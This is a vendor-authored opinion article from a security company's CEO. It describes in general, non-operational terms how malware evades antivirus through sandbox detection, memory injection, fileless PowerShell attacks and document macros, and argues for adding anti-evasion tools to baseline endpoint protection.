Chasing malware developers through their cyber rabbit holes might be a fun challenge for security researchers, but for the rest of us, the effectiveness of modern attack methods is frustrating and alarming. Incidents that involved evasive malware, and in particular fileless techniques for bypassing endpoint security measures, were prevalent in 2017. They are set to be even more damaging, costly, and exasperating in 2018.
It’s an old story by now — the more security pros learn about protecting their organizations against malware, the more wily and sophisticated the adversaries get. The adversaries will always have the incentive and the ability to bypass detection-based technologies. In order to protect their nefarious creations (and their investments), attackers will try everything they can in order to evade detection.
The ability for attackers to avoid being detected isn’t as simple as it sounds when an entire world’s worth of security experts, artificial intelligence systems, and endpoint protection software vendors are focused on doing just that. And the stakes are getting higher. Experts predict that this year, state-sponsored hackers, hacktivists, and crime syndicates will leverage and target major events like the Olympics and U.S midterm elections. Even more alarming, it is expected that ransomware attacks on hospitals and IoT devices will turn deadly, as attackers extort money and power by hijacking control of pacemakers and other critical equipment.
Malware developers use a number of techniques to ensure that their malicious code runs even on endpoints that use a variety of products dedicated to identifying, detecting, and eradicating malware. These techniques are well documented, can be understood by day-to-day attackers, and are increasingly offered as an easy-to-deploy service by cybercrime syndicates. Common evasive techniques include:
Refusing to Infect in “Hostile” Environments
Malware developers want to avoid having their code fingerprinted, which subsequently makes their malware known to antivirus solutions (and therefore readily blocked). Such malicious software is constructed to avoid virtualization environments, sandboxes, and antivirus solutions by shutting itself down and leaving no trace through artifacts or executed processes.
Using Memory Injection
Malicious code injects itself into trusted processes on the system, abusing the legitimate capabilities of the operating system or software to avoid solutions that look for new and unwanted files and processes. Malicious code is concealed in a file using a packer or other technique, so it arrives looking normal, injects itself into other legitimate applications, and gains a foothold. Such techniques are used in the fileless attacks mentioned above. One of these schemes recently made headlines by targeting organizations providing critical support to the Olympics. The attack combined a phishing email, a weaponized Word file, and a hidden PowerShell script. Using native PowerShell functions to evade pattern-matching solutions and other defenses, attackers are able to establish a link to a remote server, possibly with the intention of downloading more malware.
Using Document Files
Malware hides in documents (Word, Excel, PDF) using macros, website links, and exploits to bypass defenses. This type of attack can also be complex to detect. Consider, for example, a PDF file that contains an embedded Word document, which includes a macro that downloads and executes additional malicious code on an endpoint. These evasive tactics make it difficult for both traditional and next-gen AV solutions to separate malicious from non-malicious files.
Evasion techniques allow adversaries to get past even modern endpoint security solutions, regardless whether they’re based on signatures, behavioral monitoring, file reputation, machine learning, or heuristics. Besides being complex and creatively manipulative, there are several reasons why these evasion techniques work,even against modern AV defenses:
- All forms of AV are based, at least some extent, on historical information (signatures, behavior patterns, etc), even if this information is used to develop a machine learning model. If there are no fingerprints or historical threat artifacts to “convict” for detection, the malware is invisible to these solutions.
- Malware gets regular updates. The adversaries are motivated to keep their attack tools fresh and unknown.
- Malware is often purpose-built to avoid detection and tested against current implementations of defense solutions. Adversaries ensure that their attacks will be invisible to traditional as well as next-gen AV solutions by devising software that differs from expected patterns and adding combinations of obfuscation tactics.
Evolving Your Endpoint Protection Strategy
Baseline AV products, be they traditional or next gen, play an important role in safeguarding the endpoint, but attackers will always find ways around their detection-based approaches. That’s why such technologies aren’t sufficient by themselves to secure laptops, workstations, servers or other devices in the modern enterprise. To block attacks, security teams need to better understand the mechanics of evasion and the limits of signature, pattern, and behavior-based security solutions.
Mind the gap created by your security tools’ ability to detect and block malicious code and the hackers’ ability to evade detection — you can be sure they are well aware of it. Augment baseline AV with anti-evasion solutions designed to stop this kind of malware by blocking its attempts to bypass detection. In other words, focus on breaking or otherwise negating the evasive techniques themselves, rather than solely detecting the malicious software. By “attacking” attempts to evade your security solutions, you will force the adversaries to pick their poison: Implement evasion tactics and be stopped because of them, or don’t evade and be stopped by your baseline security controls.
If there is any hope of disarming modern and well-equipped attackers, we have to beat them at their game. Increasingly, that means outmatching them in a battle of wits by devising creative dodges, artful illusions, and cunning counter maneuvers.
About the author: Eddy Bobritsky is Co-Founder and CEO at Minerva Labs, a leading provider of anti-evasion technology for enterprise endpoints.